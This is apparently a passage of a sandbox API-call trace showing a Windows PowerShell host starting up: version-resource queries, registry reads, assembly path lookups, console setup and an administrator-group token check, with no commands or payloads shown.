	[0386.880] lstrcpyW (in: lpString1=0x3b08b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0386.880] CoTaskMemFree (pv=0x3b08b0) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08498, puLen=0x20dc10) returned 1
	[0386.881] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0386.881] CoTaskMemAlloc (cb=0x76) returned 0x344ad0
	[0386.881] lstrcpyW (in: lpString1=0x344ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0386.881] CoTaskMemFree (pv=0x344ad0) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08534, puLen=0x20dc10) returned 1
	[0386.881] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0386.881] CoTaskMemAlloc (cb=0x44) returned 0x3b08b0
	[0386.881] lstrcpyW (in: lpString1=0x3b08b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0386.881] CoTaskMemFree (pv=0x3b08b0) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08598, puLen=0x20dc10) returned 1
	[0386.881] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0386.881] CoTaskMemAlloc (cb=0x58) returned 0x2f5120
	[0386.881] lstrcpyW (in: lpString1=0x2f5120, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0386.881] CoTaskMemFree (pv=0x2f5120) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08614, puLen=0x20dc10) returned 1
	[0386.881] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0386.881] CoTaskMemAlloc (cb=0x20) returned 0x3ad5b0
	[0386.881] lstrcpyW (in: lpString1=0x3ad5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0386.881] CoTaskMemFree (pv=0x3ad5b0) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e082bc, puLen=0x20dc10) returned 1
	[0386.881] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0386.881] CoTaskMemAlloc (cb=0x66) returned 0x3ac7e0
	[0386.881] lstrcpyW (in: lpString1=0x3ac7e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0386.881] CoTaskMemFree (pv=0x3ac7e0) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x0, puLen=0x20dc10) returned 0
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x0, puLen=0x20dc10) returned 0
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x0, puLen=0x20dc10) returned 0
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dbe8, puLen=0x20dbe0 | out: lplpBuffer=0x20dbe8*=0x2e08264, puLen=0x20dbe0) returned 1
	[0386.881] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0386.881] VerLanguageNameW (in: wLang=0x0, szLang=0x33c760, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0386.881] CoTaskMemFree (pv=0x33c760) 
	[0386.881] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\", lplpBuffer=0x20dc38, puLen=0x20dc30 | out: lplpBuffer=0x20dc38*=0x2e081f0, puLen=0x20dc30) returned 1
	[0387.246] CoTaskMemAlloc (cb=0x104) returned 0x3b1d80
	[0387.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.246] CoTaskMemFree (pv=0x3b1d80) 
	[0387.250] CoTaskMemAlloc (cb=0x104) returned 0x3b1d80
	[0387.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.250] CoTaskMemFree (pv=0x3b1d80) 
	[0387.254] lstrlenW (lpString="䅁") returned 1
	[0387.263] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20db08 | out: phkResult=0x20db08*=0x2fc) returned 0x0
	[0387.265] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x20daf8 | out: phkResult=0x20daf8*=0x300) returned 0x0
	[0387.265] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20db88 | out: phkResult=0x20db88*=0x304) returned 0x0
	[0387.269] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20dacc, lpData=0x0, lpcbData=0x20dac8*=0x0 | out: lpType=0x20dacc*=0x1, lpData=0x0, lpcbData=0x20dac8*=0x56) returned 0x0
	[0387.270] CoTaskMemAlloc (cb=0x5a) returned 0x3ac770
	[0387.270] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20da9c, lpData=0x3ac770, lpcbData=0x20da98*=0x56 | out: lpType=0x20da9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20da98*=0x56) returned 0x0
	[0387.270] CoTaskMemFree (pv=0x3ac770) 
	[0387.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.607] CoTaskMemAlloc (cb=0x104) returned 0x3af3c0
	[0387.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3af3c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.607] CoTaskMemFree (pv=0x3af3c0) 
	[0389.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0389.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0390.662] CoTaskMemAlloc (cb=0x104) returned 0x3bc000
	[0390.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bc000, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.662] CoTaskMemFree (pv=0x3bc000) 
	[0390.663] CoTaskMemAlloc (cb=0x104) returned 0x3bc000
	[0390.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bc000, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.663] CoTaskMemFree (pv=0x3bc000) 
	[0391.149] CoTaskMemAlloc (cb=0x104) returned 0x3bd130
	[0391.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bd130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.149] CoTaskMemFree (pv=0x3bd130) 
	[0391.151] CoTaskMemAlloc (cb=0x104) returned 0x3bd130
	[0391.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bd130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.151] CoTaskMemFree (pv=0x3bd130) 
	[0391.151] CoTaskMemAlloc (cb=0x104) returned 0x3bd130
	[0391.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bd130, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0391.151] CoTaskMemFree (pv=0x3bd130) 
	[0392.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0392.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0392.818] CoTaskMemAlloc (cb=0x104) returned 0x3bfce0
	[0392.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bfce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.818] CoTaskMemFree (pv=0x3bfce0) 
	[0392.822] CoTaskMemAlloc (cb=0x104) returned 0x3bfce0
	[0392.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3bfce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0392.822] CoTaskMemFree (pv=0x3bfce0) 
	[0393.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0393.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0396.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0396.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0396.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0396.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0397.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0397.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0398.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0398.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0398.724] CoTaskMemAlloc (cb=0x104) returned 0x3497d0
	[0398.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3497d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.724] CoTaskMemFree (pv=0x3497d0) 
	[0398.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0398.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0399.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x20d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0399.499] SetErrorMode (uMode=0x1) returned 0x1
	[0399.499] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x20da60 | out: lpFileInformation=0x20da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0399.499] SetErrorMode (uMode=0x1) returned 0x1
	[0400.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.527] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0400.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.528] CoTaskMemFree (pv=0x1b90c710) 
	[0400.531] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0400.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.531] CoTaskMemFree (pv=0x1b90c710) 
	[0400.531] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0400.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.531] CoTaskMemFree (pv=0x1b90c710) 
	[0400.534] CoCreateGuid (in: pguid=0x20de28 | out: pguid=0x20de28*(Data1=0xe01ac5f2, Data2=0xe7c5, Data3=0x4465, Data4=([0]=0x98, [1]=0x3f, [2]=0x9, [3]=0x91, [4]=0x42, [5]=0xcb, [6]=0x27, [7]=0x24))) returned 0x0
	[0400.537] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0400.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.537] CoTaskMemFree (pv=0x1b90c710) 
	[0400.540] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0400.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.540] CoTaskMemFree (pv=0x1b90c710) 
	[0400.542] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0400.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0400.543] CoTaskMemFree (pv=0x1b90c710) 
	[0400.549] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0400.943] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x20dad0 | out: lpConsoleScreenBufferInfo=0x20dad0) returned 1
	[0400.949] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0400.950] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x20dad0 | out: lpConsoleScreenBufferInfo=0x20dad0) returned 1
	[0400.951] GetVersionExW (in: lpVersionInformation=0x20da60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20da60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0400.953] GetCurrentProcess () returned 0xffffffffffffffff
	[0400.954] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x20daf8 | out: TokenHandle=0x20daf8*=0x318) returned 1
	[0400.959] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20da18 | out: TokenInformation=0x0, ReturnLength=0x20da18) returned 0
	[0400.960] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x307290
	[0400.960] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x307290, TokenInformationLength=0x4, ReturnLength=0x20da18 | out: TokenInformation=0x307290, ReturnLength=0x20da18) returned 1
	[0400.960] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x20db78 | out: phNewToken=0x20db78*=0x314) returned 1
	[0400.960] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20da18 | out: TokenInformation=0x0, ReturnLength=0x20da18) returned 0
	[0400.960] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3072c0
	[0400.961] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x3072c0, TokenInformationLength=0x4, ReturnLength=0x20da18 | out: TokenInformation=0x3072c0, ReturnLength=0x20da18) returned 1
	[0400.961] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2ee2f70*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x20db88 | out: IsMember=0x20db88) returned 1
	[0400.961] CloseHandle (hObject=0x314) returned 1
	[0400.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0400.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
